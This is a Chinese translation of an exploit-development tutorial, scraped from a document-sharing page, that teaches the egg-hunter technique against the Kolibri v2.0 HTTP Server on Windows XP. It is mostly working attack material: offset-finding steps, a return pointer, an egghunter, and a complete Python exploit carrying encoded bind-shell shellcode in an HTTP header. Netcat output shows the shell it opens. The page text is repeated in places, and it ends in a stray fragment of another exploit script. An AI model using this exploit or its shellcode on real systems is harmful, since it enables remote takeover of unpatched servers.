寻蛋技术译者 :Netfairy 前言欢迎来到漏洞利用开发系列教程第四部分. 这部分讲解一项很酷的技术 : 寻蛋. 这部分我将用 Kolibri v2.0 HTTP Server 演示这项技术. 这里有写好的漏洞利用程序 : 这里坏字符 : \x00\x0d\x0a\x3d\x20\x3f

Size: px

Start display at page:

Download "寻蛋技术译者 :Netfairy 前言欢迎来到漏洞利用开发系列教程第四部分. 这部分讲解一项很酷的技术 : 寻蛋. 这部分我将用 Kolibri v2.0 HTTP Server 演示这项技术. 这里有写好的漏洞利用程序 : 这里坏字符 : \x00\x0d\x0a\x3d\x20\x3f"

京糖安
4 years ago
Views:

1 寻蛋技术译者 :Netfairy 前言欢迎来到漏洞利用开发系列教程第四部分. 这部分讲解一项很酷的技术 : 寻蛋. 这部分我将用 Kolibri v2.0 HTTP Server 演示这项技术. 这里有写好的漏洞利用程序 : 这里坏字符 : \x00\x0d\x0a\x3d\x20\x3f 漏洞利用环境 :Backtrack 5 调试机器 :Windows XP PRO SP3 漏洞软件 : 下载寻蛋技术介绍通过前面的学习我们知道缓冲区溢出是如何工作的. 某个 CPU 寄存器指向我们可控的缓冲区, 劫持执行流重定向到这个 CPU 寄存器指向的地址, 然后放置在缓冲区内的任何指令都会被执行. 但是假如我们得到程序控制权, 缓冲区缺放不下我们的大 payload 怎么办. 难道这个漏洞就没法利用了? 事实上是可以的. 只需完成这两件事中的一件 :(1)EIP 后的内容也出现在内存的其它地方 (2) 布置 shellcode 在不同的内存区域. 如果这些内存区域距离很近, 你可以用 jmp offset 指令从一个内存区域跳到另一个内存区域. 然而, 如果距离太远或很难访问到这里区域, 我们需要用另外的技术 ( 我们可以硬编码一个地址然后跳转到它, 为了实现稳定利用显然这不是好主意 ) 使用寻蛋技术! 寻蛋技术由一组编程指令组成, 与别的 shellcode 没什么两样. 寻蛋的目的是为了搜索整个内存空间 ( 栈 / 堆 / ) 找到我们真正的 shellcdoe 并执行它. 这里有几个可用的寻蛋指令, 如果你想知道它是如何工作的我推荐你读 skape 写的这篇文章, 事实上我会稍微修改这些寻蛋指令, 这些指令在下面 : loop_inc_page: or dx, 0x0fff // Add PAGE_SIZE-1 to edx loop_inc_one: inc edx // Increment our pointer by one loop_check: push edx // Save edx push 0x2 // Push NtAccessCheckAndAuditAlarm pop eax // Pop into eax int 0x2e // Perform the syscall cmp al, 0x05 // Did we get 0xc (ACCESS_VIOLATION)? pop edx // Restore edx

2 loop_check_8_valid: je loop_inc_page // Yes, invalid ptr, go to the next page is_egg: mov eax, 0x // Throw our egg in eax mov edi, edx // Set edi to the pointer we validated scasd // Compare the dword in edi to eax jnz loop_inc_one // No match? Increment the pointer by one scasd // Compare the dword in edi to eax again (which is now edx + 4) jnz loop_inc_one // No match? Increment the pointer by one matched: jmp edi // Found the egg. Jump 8 bytes past it into our code. 我不会解释它是怎么工作的, 你可以通过 skape 的文章了解更多细节. 你需要知道的是蛋 ( 也就是我们的 shellcode) 包含四个字节的标志头. 如果寻蛋开始, 首先它会搜索整个内存直至找到重复两次找到这个标志 ( 如果标志是 1234, 那么就搜索 ). 当找到这个标志, 改变执行流跳转到标志后的 shellcode 执行. 如果你需要寻蛋指令, 我推荐下面这个, 很小, 速度和跨 windows 平台都不错 : "\x66\x81\xca\xff" "\x0f\x42\x52\x6a" "\x02\x58\xcd\x2e" "\x3c\x05\x5a\x74" "\xef\xb8\x62\x33" #b3 "\x33\x66\x8b\xfa" #3f "\xaf\x75\xea\xaf" "\x75\xe7\xff\xe7" The tag in this case is "b33f", if you use an ASCII tag you can easily convert it to hex with a quick google search... In this case we will need to prepend our final stage shellcode with "b33fb33f" so our egg hunter can find it. 在开始前, 我会告诉你加入寻蛋指令包含坏字符怎么办. 首先我们写这 32 字节到二进制文件, 可以用我写的 bin.sh 完成, 接下来用 msfencode 编码它. 下面是一个例子. 注意编码会改变大小. root@bt:~/desktop#./bin.sh -i test.txt -o hunter -t B [>] Parsing Input File [>] Pipe output to xxd [>] Clean up [>] Done!!

3 msfencode -b '\xff' -i hunter.bin [*] x86/shikata_ga_nai succeeded with size 59 (iteration=1) buf = "\xd9\xcf\xd9\x74\x24\xf4\x5e\x33\xc9\xbf\x4d\x1a\x03\x02" + "\xb1\x09\x31\x7e\x17\x83\xee\xfc\x03\x33\x09\xe1\xf7\xad" + "\xac\x2f\x08\x3e\xed\xfd\x9d\x42\xa9\xcc\x4c\x7e\x4c\x95" + "\xe4\x91\xf6\x4b\x36\x5e\x61\x07\xc2\x0f\x18\xfd\x9c\x3a" + "\x04\xfe\x04" root@bt:~/desktop# msfencode -e x86/alpha_mixed -i hunter.bin [*] x86/alpha_mixed succeeded with size 125 (iteration=1) buf = "\xdb\xcf\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" + "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" + "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" + "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" + "\x75\x4a\x49\x43\x56\x6b\x31\x49\x5a\x6b\x4f\x46\x6f\x37" + "\x32\x46\x32\x70\x6a\x44\x42\x42\x78\x5a\x6d\x46\x4e\x77" + "\x4c\x35\x55\x32\x7a\x71\x64\x7a\x4f\x48\x38\x73\x52\x57" + "\x43\x30\x33\x62\x46\x4c\x4b\x4a\x5a\x4c\x6f\x62\x55\x6b" + "\x5a\x6e\x4f\x43\x45\x69\x77\x59\x6f\x78\x67\x41\x41" 以上的背景知识足够, 是时候开始实战了!!! 重现崩溃针对 Kolibri v2.0 HTTP Server 的利用, 我们把 shellcode 嵌入到一个 HTTP 请求. 下面是 POC. 实际应用中你可能需要改变 EIP; 8080 是默认端口. #!/usr/bin/python import socket import os import sys Stage1 = "A"*600 buffer = ( "HEAD /" + Stage1 + " HTTP/1.1\r\n" "Host: :8080\r\n" "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv: ) Gecko/ Firefox/3.6.12\r\n" "Keep-Alive: 115\r\n" "Connection: keep-alive\r\n\r\n")

expl = socket.socket(socket.af_inet, socket.sock_stream) expl.connect(("192.168.111.128", 8080)) expl.send(buffer) expl.

4 expl = socket.socket(socket.af_inet, socket.sock_stream) expl.connect((" ", 8080)) expl.send(buffer) expl.close() 附加 Kolibri 到 Immunity Debugger 调试器并执行这个 POC, 下图可以看到我们成功覆写 EIP 并且 ESP 指向我们的缓冲区. 注意如果我们发送超长的字符串同样可以覆盖到 SHE. 很有方法利用这个漏洞, 我决定使用寻蛋技术. 第一阶段细心的读者可能注意到 POC 中缓冲区变量名是 Stage1, 更多在随后的 Stage2. 先找出 EIP 和 ESP 偏移. 通常都用 metasplot pattern 替换原字符串. root@bt:~/desktop# cd /pentest/exploits/framework/tools/ root@bt:/pentest/exploits/framework/tools#./pattern_create.rb 600 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4 Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A d5ad6ad7ad8ad9ae0ae1ae2ae3ae4ae5ae6ae7ae8ae9af0af1af2af3af4af5af6af7af8af9ag0a

g1ag2ag3ag4ag5ag6ag7ag8ag9ah 0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7A j8aj9ak0ak1ak2ak3ak4ak5

o1ao2ao3ao4ao5ao6ao7ao8ao9ap0ap1ap2ap3ap4ap5ap6ap7ap8ap9aq0aq1aq2aq3aq4aq 5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar

5 g1ag2ag3ag4ag5ag6ag7ag8ag9ah 0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7A j8aj9ak0ak1ak2ak3ak4ak5 Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An 0An1An2An3An4An5An6An7An8An9Ao0A o1ao2ao3ao4ao5ao6ao7ao8ao9ap0ap1ap2ap3ap4ap5ap6ap7ap8ap9aq0aq1aq2aq3aq4aq 5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar 6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9 很好, 重新布置我们的缓冲区. 515 字节覆盖到 EIP, ESP 指向 EIP 后面的区域. Stage1 = "A"*515 + [EIP] + BBBBB... 找一条直接跳转到 ESP 的指令. 记住不能有坏字符. 看下图, 这有几个选择. 它们属于系统 dll 模块但这不重要. 选择其中一个指针. 这里我要解释第一阶段的目的 : 嵌入寻蛋指令. 现在有几个选择, 我们可以把寻蛋指令放置在 ESP 处. 但为了整洁, 我宁愿将寻蛋指令布置在被覆盖的 EIP 之前 ; 要

$做到这一点, 我们将放置一个短跳指令, 向后跳到我们的缓冲区这种短跳只需要 2 个字节, 所以我们要调整我们的缓冲区如下. 译者注图 Pointer: 0x77c35459 : push esp # ret {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v7.$

6 做到这一点, 我们将放置一个短跳指令, 向后跳到我们的缓冲区这种短跳只需要 2 个字节, 所以我们要调整我们的缓冲区如下. 译者注图 Pointer: 0x77c35459 : push esp # ret {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v (C:\WINDOWS\system32\msvcrt.dll) Buffer: Stage1 = "A"*515 + "\x59\x54\xc3\x77" +"B"*2 现在我们只是把短跳转指令设置为 BB, 新的 POC 如下 : #!/usr/bin/python import socket import os import sys # badchars: \x00\x0d\x0a\x3d\x20\x3f # # Stage1: # # (1) EIP: 0x77C35459 push esp # ret msvcrt.dll # # (2) ESP: jump back 60 bytes in the buffer =>???? # Stage1 = "A"*515 + "\x59\x54\xc3\x77" + "B"*2 buffer = ( "HEAD /" + Stage1 + " HTTP/1.1\r\n" "Host: :8080\r\n" "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv: ) Gecko/ Firefox/3.6.12\r\n" "Keep-Alive: 115\r\n" "Connection: keep-alive\r\n\r\n") expl = socket.socket(socket.af_inet, socket.sock_stream) expl.connect((" ", 8080)) expl.send(buffer)

7 expl.close() 重新打开这个 POC, 看到程序中断完美! 继续 F7 最终会执行到 BB. 是时候设置跳转到寻蛋指令了. 短跳转用 EB+ 跳转的目标距离. 用 windows 的计算器就可以完成. 观察下面两张图 Short Jump = \xeb

$-60 bytes = \xc4 在漏洞利用中其实 windows 的计算器也很有用.$

8 -60 bytes = \xc4 在漏洞利用中其实 windows 的计算器也很有用. 现在验证我们算的对不对, 新的缓冲区如下 : Stage1 = "A"*515 + "\x59\x54\xc3\x77" +"\xeb\xc4" 运行 POC, 下图一断在短跳转指令, F7 后, 再看下图二, 程序往前跳了 60 字节, 转到我们的寻蛋指令第一阶段只剩下设置寻蛋指令了. 你可以使用或修改教程开头的那个寻蛋指令. 但是 mona 同样可以生产寻蛋指令.!mona help egg!mona egg t b33f

9 上图可以看到寻蛋指令 32 字节. 下图可以看到寻蛋指令非常靠近 EIP 和短跳转指令. #!/usr/bin/python import socket import os import sys

10 #Egghunter #Size 32-bytes hunter = ( "\x66\x81\xca\xff" "\x0f\x42\x52\x6a" "\x02\x58\xcd\x2e" "\x3c\x05\x5a\x74" "\xef\xb8\x62\x33" #b3 "\x33\x66\x8b\xfa" #3f "\xaf\x75\xea\xaf" "\x75\xe7\xff\xe7") # badchars: \x00\x0d\x0a\x3d\x20\x3f # # Stage1: # # (1) EIP: 0x77C35459 push esp # ret msvcrt.dll # # (2) ESP: jump back 60 bytes in the buffer => \xeb\xc4 # # (3) Enough room for egghunter; marker "b33f" # Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xc3\x77" + "\xeb\xc4" buffer = ( "HEAD /" + Stage1 + " HTTP/1.1\r\n" "Host: :8080\r\n" "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv: ) Gecko/ Firefox/3.6.12\r\n" "Keep-Alive: 115\r\n" "Connection: keep-alive\r\n\r\n") expl = socket.socket(socket.af_inet, socket.sock_stream) expl.connect((" ", 8080)) expl.send(buffer) expl.close() 第一阶段我们成功控制程序执行到寻蛋指令, 寻蛋指令将会搜索内存 shellcode. 因为还没有布置蛋 (shellcode), 所以别运行上面这个脚本 (CPU 会 100%). 第二阶段现在只剩下布置蛋 (shellcode) 了. HTPP 请求包含几个字段, 不是所有的字段都有必要设置, 为了方便我把它们叫做字段 1,2,3,4,5. 如果字段 1 存在缓冲区溢出, 那么就不必设置字段 2 了.

11 让我们看了看设置 User-Agent 为 1000 字节 metasploit 模式的字符串时候会发生什么, POC 如下 : #!/usr/bin/python import socket import os import sys #Egghunter #Size 32-bytes hunter = ( "\x66\x81\xca\xff" "\x0f\x42\x52\x6a" "\x02\x58\xcd\x2e" "\x3c\x05\x5a\x74" "\xef\xb8\x62\x33" #b3 "\x33\x66\x8b\xfa" #3f "\xaf\x75\xea\xaf" "\x75\xe7\xff\xe7") # badchars: \x00\x0d\x0a\x3d\x20\x3f # # Stage1: # # (1) EIP: 0x77C35459 push esp # ret msvcrt.dll # # (2) ESP: jump back 60 bytes in the buffer => \xeb\xc4 # # (3) Enough room for egghunter; marker "b33f" # Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xc3\x77" + "\xeb\xc4" Stage2 = "Aa0Aa1Aa...0Bh1Bh2B" #1000-bytes buffer = ( "HEAD /" + Stage1 + " HTTP/1.1\r\n" "Host: :8080\r\n" "User-Agent: " + Stage2 + "\r\n" "Keep-Alive: 115\r\n" "Connection: keep-alive\r\n\r\n") expl = socket.socket(socket.af_inet, socket.sock_stream) expl.connect((" ", 8080)) expl.send(buffer) expl.close()

12 附加 Kolibri 到调试器, 然后在 0x77C35459 下断. 用!mona 搜索 metasploit 模式字符串, 试了三次都能搜索到, 事实上我做了一些测试, 我们完全可以注入更大的空间虽然 1000 字节已经足够大了. 如果在第二部分用蛋 (shellcode) 而不是 metasploi 模式的字符串, 寻蛋指令将会搜到内存找到 shellcode 并执行它, 事实上教程到这里应该可以结束了, Shellcode+ 游戏结束现在剩下两件事 :1) 布置 shellcode 2) 生成一个你喜欢的 shellcode. 下面是最终的 POC, 注意 Stage2 包含蛋标志 b33f. #!/usr/bin/python import socket import os import sys #Egghunter #Size 32-bytes hunter = ( "\x66\x81\xca\xff" "\x0f\x42\x52\x6a" "\x02\x58\xcd\x2e" "\x3c\x05\x5a\x74" "\xef\xb8\x62\x33" #b3 "\x33\x66\x8b\xfa" #3f "\xaf\x75\xea\xaf" "\x75\xe7\xff\xe7") shellcode = ( ) # badchars: \x00\x0d\x0a\x3d\x20\x3f #

13 # Stage1: # # (1) EIP: 0x77C35459 push esp # ret msvcrt.dll # # (2) ESP: jump back 60 bytes in the buffer => \xeb\xc4 # # (3) Enough room for egghunter; marker "b33f" # # Stage2: # # (4) We embed the final stage payload in the HTTP header, which will be put # # somewhere in memory at the time of the initial crash, b00m Game Over!! # Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xc3\x77" + "\xeb\xc4" Stage2 = "b33fb33f" + shellcode buffer = ( "HEAD /" + Stage1 + " HTTP/1.1\r\n" "Host: :8080\r\n" "User-Agent: " + Stage2 + "\r\n" "Keep-Alive: 115\r\n" "Connection: keep-alive\r\n\r\n") expl = socket.socket(socket.af_inet, socket.sock_stream) expl.connect((" ", 8080)) expl.send(buffer) expl.close() 生成 shellcode root@bt:~# msfpayload -l [...snip...] windows/shell/reverse_tcp_dns (staged) windows/shell_bind_tcp windows/shell_bind_tcp_xpfw spawn a [...snip...] Connect back to the attacker, Spawn a piped command shell Listen for a connection and spawn a command shell Disable the Windows ICF, then listen for a connection and command shell root@bt:~# msfpayload windows/shell_bind_tcp O Name: Windows Command Shell, Bind TCP Inline Module: payload/windows/shell_bind_tcp Version: 8642 Platform: Windows Arch: x86

14 Needs Admin: No Total size: 341 Rank: Normal Provided by: vlad902 sf Basic options: Name Current Setting Required Description EXITFUNC process yes Exit technique: seh, thread, process, none LPORT 4444 yes The listen port RHOST no The target address Description: Listen for a connection and spawn a command shell root@bt:~# msfpayload windows/shell_bind_tcp LPORT=9988 R msfencode -e x86/alpha_mixed -t c [*] x86/alpha_mixed succeeded with size 744 (iteration=1) unsigned char buf[] = "\xdb\xcf\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58" "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c" "\x4a\x48\x6d\x59\x67\x70\x77\x70\x67\x70\x53\x50\x4d\x59\x4b" "\x55\x75\x61\x49\x42\x35\x34\x6c\x4b\x52\x72\x70\x30\x6c\x4b" "\x43\x62\x54\x4c\x4c\x4b\x62\x72\x76\x74\x6c\x4b\x72\x52\x35" "\x78\x36\x6f\x6e\x57\x42\x6a\x76\x46\x66\x51\x6b\x4f\x50\x31" "\x69\x50\x6c\x6c\x75\x6c\x35\x31\x53\x4c\x46\x62\x34\x6c\x37" "\x50\x6f\x31\x58\x4f\x74\x4d\x75\x51\x49\x57\x6d\x32\x4c\x30" "\x66\x32\x31\x47\x4e\x6b\x46\x32\x54\x50\x4c\x4b\x62\x62\x45" "\x6c\x63\x31\x68\x50\x4c\x4b\x61\x50\x42\x58\x4b\x35\x39\x50" "\x33\x44\x61\x5a\x45\x51\x5a\x70\x66\x30\x6c\x4b\x57\x38\x74" "\x58\x4c\x4b\x50\x58\x57\x50\x66\x61\x58\x53\x78\x63\x35\x6c" "\x62\x69\x6e\x6b\x45\x64\x6c\x4b\x76\x61\x59\x46\x45\x61\x39" "\x6f\x70\x31\x39\x50\x6c\x6c\x4f\x31\x48\x4f\x66\x6d\x45\x51" "\x79\x57\x46\x58\x49\x70\x50\x75\x39\x64\x73\x33\x61\x6d\x59" "\x68\x77\x4b\x53\x4d\x31\x34\x32\x55\x38\x62\x61\x48\x6c\x4b" "\x33\x68\x64\x64\x76\x61\x4e\x33\x43\x56\x4c\x4b\x44\x4c\x70" "\x4b\x6e\x6b\x51\x48\x35\x4c\x43\x31\x4b\x63\x4e\x6b\x55\x54" "\x6e\x6b\x47\x71\x48\x50\x4c\x49\x31\x54\x45\x74\x36\x44\x43"

15 "\x6b\x43\x6b\x65\x31\x52\x79\x63\x6a\x72\x71\x39\x6f\x6b\x50" "\x56\x38\x33\x6f\x50\x5a\x4c\x4b\x36\x72\x38\x6b\x4c\x46\x53" "\x6d\x42\x48\x47\x43\x55\x62\x63\x30\x35\x50\x51\x78\x61\x67" "\x43\x43\x77\x42\x31\x4f\x52\x74\x35\x38\x70\x4c\x74\x37\x37" "\x56\x37\x77\x4b\x4f\x78\x55\x6c\x78\x4c\x50\x67\x71\x67\x70" "\x75\x50\x64\x69\x49\x54\x36\x34\x36\x30\x35\x38\x71\x39\x6f" "\x70\x42\x4b\x55\x50\x79\x6f\x4a\x75\x66\x30\x56\x30\x52\x70" "\x76\x30\x77\x30\x66\x30\x73\x70\x66\x30\x62\x48\x68\x6a\x54" "\x4f\x4b\x6f\x4b\x50\x79\x6f\x78\x55\x4f\x79\x59\x57\x75\x61" "\x6b\x6b\x42\x73\x51\x78\x57\x72\x35\x50\x55\x77\x34\x44\x4d" "\x59\x4d\x36\x33\x5a\x56\x70\x66\x36\x43\x67\x63\x58\x38\x42" "\x4b\x6b\x64\x77\x50\x67\x39\x6f\x4a\x75\x66\x33\x33\x67\x73" "\x58\x4f\x47\x4d\x39\x55\x68\x69\x6f\x49\x6f\x5a\x75\x33\x63" "\x32\x73\x53\x67\x42\x48\x71\x64\x6a\x4c\x47\x4b\x59\x71\x59" "\x6f\x5a\x75\x30\x57\x4f\x79\x78\x47\x61\x78\x34\x35\x30\x6e" "\x70\x4d\x63\x51\x39\x6f\x69\x45\x72\x48\x75\x33\x50\x6d\x55" "\x34\x57\x70\x6f\x79\x5a\x43\x43\x67\x71\x47\x31\x47\x54\x71" "\x5a\x56\x32\x4a\x52\x32\x50\x59\x66\x36\x58\x62\x39\x6d\x71" "\x76\x4b\x77\x31\x54\x44\x64\x65\x6c\x77\x71\x37\x71\x4c\x4d" "\x37\x34\x57\x54\x34\x50\x59\x56\x55\x50\x43\x74\x61\x44\x46" "\x30\x73\x66\x30\x56\x52\x76\x57\x36\x72\x76\x42\x6e\x46\x36" "\x66\x36\x42\x73\x50\x56\x65\x38\x42\x59\x7a\x6c\x67\x4f\x4e" "\x66\x79\x6f\x4a\x75\x4d\x59\x6b\x50\x62\x6e\x76\x36\x42\x66" "\x4b\x4f\x36\x50\x71\x78\x54\x48\x4c\x47\x75\x4d\x51\x70\x4b" "\x4f\x48\x55\x6f\x4b\x6c\x30\x78\x35\x6f\x52\x33\x66\x33\x58" "\x6c\x66\x4f\x65\x6f\x4d\x4f\x6d\x6b\x4f\x7a\x75\x75\x6c\x56" "\x66\x51\x6c\x65\x5a\x4b\x30\x79\x6b\x69\x70\x51\x65\x77\x75" "\x6d\x6b\x30\x47\x36\x73\x31\x62\x62\x4f\x32\x4a\x47\x70\x61" "\x43\x4b\x4f\x4b\x65\x41\x41"; 增加一些注释, 最后的 POC 如下 #!/usr/bin/python # Exploit: Kolibri v2.0 HTTP Server HEAD (egghunter) # # Author: b33f (Ruben Boonen) - # # OS: WinXP PRO SP3 # # Software: # # f248239d09b37400e8269cb1347c240e-bladeapimonitor setup.exe # # This exploit was created for Part 4 of my Exploit Development tutorial # # series - # # root@bt:~/desktop# nc -nv #

16 # (UNKNOWN) [ ] 9988 (?) open # # Microsoft Windows XP [Version ] # # (C) Copyright Microsoft Corp. # # # # C:\Documents and Settings\Administrator\Desktop> # import socket import os import sys #Egghunter #Size 32-bytes hunter = ( "\x66\x81\xca\xff" "\x0f\x42\x52\x6a" "\x02\x58\xcd\x2e" "\x3c\x05\x5a\x74" "\xef\xb8\x62\x33" #b3 "\x33\x66\x8b\xfa" #3f "\xaf\x75\xea\xaf" "\x75\xe7\xff\xe7") #msfpayload windows/shell_bind_tcp LPORT=9988 R msfencode -e x86/alpha_mixed -t c #[*] x86/alpha_mixed succeeded with size 744 (iteration=1) shellcode = ( "\xdb\xcf\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58" "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c" "\x4a\x48\x6d\x59\x67\x70\x77\x70\x67\x70\x53\x50\x4d\x59\x4b" "\x55\x75\x61\x49\x42\x35\x34\x6c\x4b\x52\x72\x70\x30\x6c\x4b" "\x43\x62\x54\x4c\x4c\x4b\x62\x72\x76\x74\x6c\x4b\x72\x52\x35" "\x78\x36\x6f\x6e\x57\x42\x6a\x76\x46\x66\x51\x6b\x4f\x50\x31" "\x69\x50\x6c\x6c\x75\x6c\x35\x31\x53\x4c\x46\x62\x34\x6c\x37" "\x50\x6f\x31\x58\x4f\x74\x4d\x75\x51\x49\x57\x6d\x32\x4c\x30" "\x66\x32\x31\x47\x4e\x6b\x46\x32\x54\x50\x4c\x4b\x62\x62\x45" "\x6c\x63\x31\x68\x50\x4c\x4b\x61\x50\x42\x58\x4b\x35\x39\x50" "\x33\x44\x61\x5a\x45\x51\x5a\x70\x66\x30\x6c\x4b\x57\x38\x74" "\x58\x4c\x4b\x50\x58\x57\x50\x66\x61\x58\x53\x78\x63\x35\x6c" "\x62\x69\x6e\x6b\x45\x64\x6c\x4b\x76\x61\x59\x46\x45\x61\x39" "\x6f\x70\x31\x39\x50\x6c\x6c\x4f\x31\x48\x4f\x66\x6d\x45\x51" "\x79\x57\x46\x58\x49\x70\x50\x75\x39\x64\x73\x33\x61\x6d\x59" "\x68\x77\x4b\x53\x4d\x31\x34\x32\x55\x38\x62\x61\x48\x6c\x4b"

17 "\x33\x68\x64\x64\x76\x61\x4e\x33\x43\x56\x4c\x4b\x44\x4c\x70" "\x4b\x6e\x6b\x51\x48\x35\x4c\x43\x31\x4b\x63\x4e\x6b\x55\x54" "\x6e\x6b\x47\x71\x48\x50\x4c\x49\x31\x54\x45\x74\x36\x44\x43" "\x6b\x43\x6b\x65\x31\x52\x79\x63\x6a\x72\x71\x39\x6f\x6b\x50" "\x56\x38\x33\x6f\x50\x5a\x4c\x4b\x36\x72\x38\x6b\x4c\x46\x53" "\x6d\x42\x48\x47\x43\x55\x62\x63\x30\x35\x50\x51\x78\x61\x67" "\x43\x43\x77\x42\x31\x4f\x52\x74\x35\x38\x70\x4c\x74\x37\x37" "\x56\x37\x77\x4b\x4f\x78\x55\x6c\x78\x4c\x50\x67\x71\x67\x70" "\x75\x50\x64\x69\x49\x54\x36\x34\x36\x30\x35\x38\x71\x39\x6f" "\x70\x42\x4b\x55\x50\x79\x6f\x4a\x75\x66\x30\x56\x30\x52\x70" "\x76\x30\x77\x30\x66\x30\x73\x70\x66\x30\x62\x48\x68\x6a\x54" "\x4f\x4b\x6f\x4b\x50\x79\x6f\x78\x55\x4f\x79\x59\x57\x75\x61" "\x6b\x6b\x42\x73\x51\x78\x57\x72\x35\x50\x55\x77\x34\x44\x4d" "\x59\x4d\x36\x33\x5a\x56\x70\x66\x36\x43\x67\x63\x58\x38\x42" "\x4b\x6b\x64\x77\x50\x67\x39\x6f\x4a\x75\x66\x33\x33\x67\x73" "\x58\x4f\x47\x4d\x39\x55\x68\x69\x6f\x49\x6f\x5a\x75\x33\x63" "\x32\x73\x53\x67\x42\x48\x71\x64\x6a\x4c\x47\x4b\x59\x71\x59" "\x6f\x5a\x75\x30\x57\x4f\x79\x78\x47\x61\x78\x34\x35\x30\x6e" "\x70\x4d\x63\x51\x39\x6f\x69\x45\x72\x48\x75\x33\x50\x6d\x55" "\x34\x57\x70\x6f\x79\x5a\x43\x43\x67\x71\x47\x31\x47\x54\x71" "\x5a\x56\x32\x4a\x52\x32\x50\x59\x66\x36\x58\x62\x39\x6d\x71" "\x76\x4b\x77\x31\x54\x44\x64\x65\x6c\x77\x71\x37\x71\x4c\x4d" "\x37\x34\x57\x54\x34\x50\x59\x56\x55\x50\x43\x74\x61\x44\x46" "\x30\x73\x66\x30\x56\x52\x76\x57\x36\x72\x76\x42\x6e\x46\x36" "\x66\x36\x42\x73\x50\x56\x65\x38\x42\x59\x7a\x6c\x67\x4f\x4e" "\x66\x79\x6f\x4a\x75\x4d\x59\x6b\x50\x62\x6e\x76\x36\x42\x66" "\x4b\x4f\x36\x50\x71\x78\x54\x48\x4c\x47\x75\x4d\x51\x70\x4b" "\x4f\x48\x55\x6f\x4b\x6c\x30\x78\x35\x6f\x52\x33\x66\x33\x58" "\x6c\x66\x4f\x65\x6f\x4d\x4f\x6d\x6b\x4f\x7a\x75\x75\x6c\x56" "\x66\x51\x6c\x65\x5a\x4b\x30\x79\x6b\x69\x70\x51\x65\x77\x75" "\x6d\x6b\x30\x47\x36\x73\x31\x62\x62\x4f\x32\x4a\x47\x70\x61" "\x43\x4b\x4f\x4b\x65\x41\x41") # badchars: \x00\x0d\x0a\x3d\x20\x3f # # Stage1: # # (1) EIP: 0x77C35459 push esp # ret msvcrt.dll # # (2) ESP: jump back 60 bytes in the buffer => \xeb\xc4 # # (3) Enough room for egghunter; marker "b33f" # # Stage2: # # (*) For reliability we use the x86/alpha_mixed encoder (we have as much space # # as we could want), possibly this region of memory has a different set of #

$! # Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xc3\x77" + "\xeb\xc4" Stage2 = "b33fb33f" + shellcode buffer = ( "HEAD /" + Stage1 + " HTTP/1.1\r\n" "Host: 192.168.111.$

18 # badcharacters. # # (4) We embed the final stage payload in the HTTP header, which will be put # # somewhere in memory at the time of the initial crash, b00m Game Over!! # Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xc3\x77" + "\xeb\xc4" Stage2 = "b33fb33f" + shellcode buffer = ( "HEAD /" + Stage1 + " HTTP/1.1\r\n" "Host: :8080\r\n" "User-Agent: " + Stage2 + "\r\n" "Keep-Alive: 115\r\n" "Connection: keep-alive\r\n\r\n") expl = socket.socket(socket.af_inet, socket.sock_stream) expl.connect((" ", 8080)) expl.send(buffer) expl.close() 下图可以看到 Kolibri 接收到我们恶意的 HTTP 请求, netstat an 显示我们的 binshell 正在监听. 连接后会输出如下, 游戏结束!! root@bt:~/desktop# nc -nv (UNKNOWN) [ ] 9988 (?) open Microsoft Windows XP [Version ] (C) Copyright Microsoft Corp.

19 C:\Documents and Settings\Administrator\Desktop>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix. : localdomain IP Address : Subnet Mask : Default Gateway : C:\Documents and Settings\Administrator\Desktop>

#!/usr/bin/python -w filename="evil.plf" buffer = "A"*2000 textfile = open(filename, 'w') textfile.write(buffer) textfile.close() 创建 plf 文件, 用 immunit

